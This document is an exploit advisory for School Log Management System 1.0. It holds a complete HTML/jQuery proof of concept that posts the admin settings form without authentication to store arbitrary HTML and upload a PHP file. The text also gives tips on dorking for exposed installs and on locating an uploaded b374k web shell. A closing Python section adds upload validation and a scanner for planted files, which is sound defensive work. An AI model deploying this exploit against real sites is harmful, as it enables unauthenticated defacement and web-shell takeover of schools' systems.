=============================================================================================================================================
| # Title : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability |
| # Listed as : School Log Management System 1.0 SQL Injection / Code Execution |
| # Author : indoushka |
| # Published : 2024-08-26 via https://packetstormsecurity.com/files/180361/slms10-exec.txt |
| # Tested on : Windows 10 Fr (Pro) / browser : Mozilla Firefox 129.0.1 (64-bit) |
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip |
=============================================================================================================================================

poc :

[+] Dorking in Google or another search engine for exposed installs.

[+] Part 01 : about-us.php (the public page that renders the stored About content and the cover image back).

[+] This payload stores HTML of your choice in the database through the site settings form. The About field is a Froala WYSIWYG editor (v4.2.1 in the target; the PoC loads 4.0.1 from cdnjs, which makes no difference to the request, since what is sent is a plain multipart/form-data POST). The PoC attaches nothing but the form fields: no session cookie and no token.

[+] The form is submitted with jQuery $.ajax; set the url value (http://127.0.0.1/slms/admin/ajax.php?action=save_settings below) to your target.

[+] Save the payload as poc.html and open it in a browser. When poc.html is served from a different origin than the target, the browser will not let the script read the response (the target sends no CORS headers), so the success toast may never appear even though the request was delivered; confirm the result on about-us.php instead.

[+] payload :

<!DOCTYPE html>
<html lang="en">

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Settings Management</title>
<!-- Froala Editor CSS -->
<link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">
<!-- Bootstrap CSS -->
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
<style>
/* Custom Styles */
#cimg {
  max-width: 100%;
  height: auto;
}
#preloader2 {
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background: rgba(0, 0, 0, 0.5);
  display: flex;
  justify-content: center;
  align-items: center;
  z-index: 9999;
}
#alert_toast {
  position: fixed;
  top: 1rem;
  right: 1rem;
  z-index: 10000;
}
.form-group {
  margin-bottom: 1rem;
}
.form-group label {
  display: block;
  margin-bottom: .5rem;
}
.form-group input, .form-group textarea {
  width: 100%;
  padding: .5rem;
  box-sizing: border-box;
}
</style>
</head>

<body>
<div class="container">
  <form id="manage-settings" method="post" enctype="multipart/form-data">
    <div class="form-group">
      <label for="name">Name</label>
      <input type="text" id="name" name="name" required>
    </div>
    <div class="form-group">
      <label for="email">Email</label>
      <input type="email" id="email" name="email" required>
    </div>
    <div class="form-group">
      <label for="contact">Contact</label>
      <input type="tel" id="contact" name="contact" required>
    </div>
    <div class="form-group">
      <label for="about">About Content</label>
      <!-- Froala replaces this textarea with the WYSIWYG editor; its HTML is sent as the "about" field -->
      <textarea class="text-jqte" id="about" name="about"></textarea>
    </div>
    <div class="form-group">
      <label for="img">Cover Image</label>
      <!-- accept="image/*" only filters the file picker; it does not restrict what is uploaded -->
      <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">
      <img id="cimg" src="" alt="Selected Image Preview">
    </div>
    <button type="submit" class="btn btn-primary">Save Settings</button>
  </form>
</div>

<!-- toast element used by alert_toast(); the PoC referenced it but did not include it -->
<div id="alert_toast" class="toast text-white" role="alert" aria-live="assertive" aria-atomic="true">
  <div class="toast-body"></div>
</div>

<div class="modal fade" id="viewer_modal" role="dialog">
  <div class="modal-dialog modal-md" role="document">
    <div class="modal-content">
      <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>
      <img src="" alt="">
    </div>
  </div>
</div>

<!-- jQuery -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<!-- Froala Editor JS -->
<script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>
<!-- Bootstrap JS (for modals and toasts) -->
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>

<script>
// Local preview of the chosen file; purely cosmetic.
function displayImg(input, _this) {
  if (input.files && input.files[0]) {
    var reader = new FileReader();
    reader.onload = function (e) {
      $('#cimg').attr('src', e.target.result);
    };
    reader.readAsDataURL(input.files[0]);
  }
}

$(document).ready(function () {
  const editorInstance = new FroalaEditor('.text-jqte');
});

// The request itself: every form field, including the file, is posted to
// save_settings with no session cookie or token attached.
$('#manage-settings').submit(function (e) {
  e.preventDefault();
  start_load();
  $.ajax({
    url: 'http://127.0.0.1/slms/admin/ajax.php?action=save_settings', // set your target url
    data: new FormData($(this)[0]),
    cache: false,
    contentType: false,
    processData: false,
    method: 'POST',
    type: 'POST',
    error: err => {
      // status 0 here usually means the browser blocked reading a cross-origin
      // response; the request may still have been accepted by the server.
      console.log(err);
      end_load();
      alert_toast('Request failed or response not readable (status ' + err.status + ')', 'danger');
    },
    success: function (resp) {
      end_load();
      if (resp == 1) {
        alert_toast('Data successfully saved.', 'success');
        setTimeout(function () {
          location.reload();
        }, 1000);
      }
    }
  });
});

window.start_load = function () {
  $('body').prepend('<div id="preloader2"></div>');
};

window.end_load = function () {
  $('#preloader2').fadeOut('fast', function () {
    $(this).remove();
  });
};

// Helpers below were copied along with the settings page; only alert_toast,
// start_load and end_load are used by this PoC.
window.viewer_modal = function ($src = '') {
  start_load();
  var t = $src.split('.');
  t = t[t.length - 1]; // file extension (last dot-separated part, not the second)
  if (t == 'mp4') {
    var view = $("<video src='" + $src + "' controls autoplay></video>");
  } else {
    var view = $("<img src='" + $src + "' />");
  }
  $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();
  $('#viewer_modal .modal-content').append(view);
  $('#viewer_modal').modal({
    show: true,
    backdrop: 'static',
    keyboard: false,
    focus: true
  });
  end_load();
};

window.uni_modal = function ($title = '', $url = '', $size = '') {
  start_load();
  $.ajax({
    url: $url,
    error: err => {
      console.log(err);
      alert("An error occurred");
    },
    success: function (resp) {
      if (resp) {
        $('#uni_modal .modal-title').html($title);
        $('#uni_modal .modal-body').html(resp);
        if ($size != '') {
          $('#uni_modal .modal-dialog').addClass($size);
        } else {
          $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");
        }
        $('#uni_modal').modal({
          show: true,
          backdrop: 'static',
          keyboard: false,
          focus: true
        });
        end_load();
      }
    }
  });
};

window._conf = function ($msg = '', $func = '', $params = []) {
  $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");
  $('#confirm_modal .modal-body').html($msg);
  $('#confirm_modal').modal('show');
};

window.alert_toast = function ($msg = 'TEST', $bg = 'success') {
  $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');

  if ($bg == 'success')
    $('#alert_toast').addClass('bg-success');
  if ($bg == 'danger')
    $('#alert_toast').addClass('bg-danger');
  if ($bg == 'info')
    $('#alert_toast').addClass('bg-info');
  if ($bg == 'warning')
    $('#alert_toast').addClass('bg-warning');

  $('#alert_toast .toast-body').html($msg);
  $('#alert_toast').toast({ delay: 3000 }).toast('show');
};
</script>
</body>

</html>

[+] Path : the uploaded cover image is stored under admin/assets/uploads/ as <unix timestamp>_<original file name>, with the original extension kept, and the page references it as a CSS background, which is how the stored path can be read off about-us.php:

background: url(admin/assets/uploads/1724235960_b374k.php);

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================
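The check the advisory's upload path shows is missing, as an added example (written here in Python as a reference, not the project's PHP): a storage-name function that accepts only allow-listed image extensions whose magic bytes agree and that renames the file to a random token, beside a scanner that applies the same rules to an existing admin/assets/uploads/ directory so that already-planted files such as 1724235960_b374k.php are found. The <unix timestamp>_<original name> layout of the sample directory is taken from the advisory's path; the sample file contents are constructed.

```python
"""Upload validation that would have rejected the advisory's .php cover image,
plus a retroactive scan of an uploads directory using the same rules."""
import os
import re
import secrets
import tempfile

# Extension allow-list paired with the magic bytes each type must start with.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
PHP_TAG = re.compile(rb"<\?(php|=)", re.I)


def _ext(name):
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def safe_stored_name(original_name, head):
    """Return a random <token>.<ext> storage name, or None if the upload is rejected.

    `head` is the first few hundred bytes of the file. The extension must be on
    the allow-list, the magic bytes must match that extension, and no PHP open
    tag may appear in the header. The original name is never reused, so the
    <timestamp>_<name> scheme that preserved ".php" is gone.
    """
    ext = _ext(original_name)
    magic = ALLOWED.get(ext)
    if magic is None or not head.startswith(magic) or PHP_TAG.search(head):
        return None
    return f"{secrets.token_hex(16)}.{ext}"


def scan_uploads(directory):
    """Return [(filename, reason)] for files the rules above would have rejected."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        with open(path, "rb") as fh:
            head = fh.read(512)
        ext = _ext(name)
        if ext not in ALLOWED:
            findings.append((name, f"extension .{ext or '?'} is not an image type"))
        elif not head.startswith(ALLOWED[ext]):
            findings.append((name, f"magic bytes do not match .{ext}"))
        elif PHP_TAG.search(head):
            findings.append((name, "PHP open tag inside image header"))
    return findings


def demo():
    """Constructed uploads directory in the target's <timestamp>_<name> layout."""
    with tempfile.TemporaryDirectory() as d:
        samples = {
            "1724235900_logo.png": ALLOWED["png"] + b"\x00" * 32,
            "1724235960_b374k.php": b"<?php echo 'planted'; ?>",   # the advisory's case
            "1724236000_cover.jpg": b"<?php echo 1; ?>",           # image name, PHP body
            "1724236100_pic.gif": b"GIF89a" + b"\x00" * 16,
        }
        for name, data in samples.items():
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)
        return scan_uploads(d)


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

The header-only PHP-tag check is a tripwire, not a parser: a valid PNG with PHP appended after the first 512 bytes passes it, which is why the random storage name and a web-server rule that refuses to execute anything under the uploads directory matter more than content sniffing.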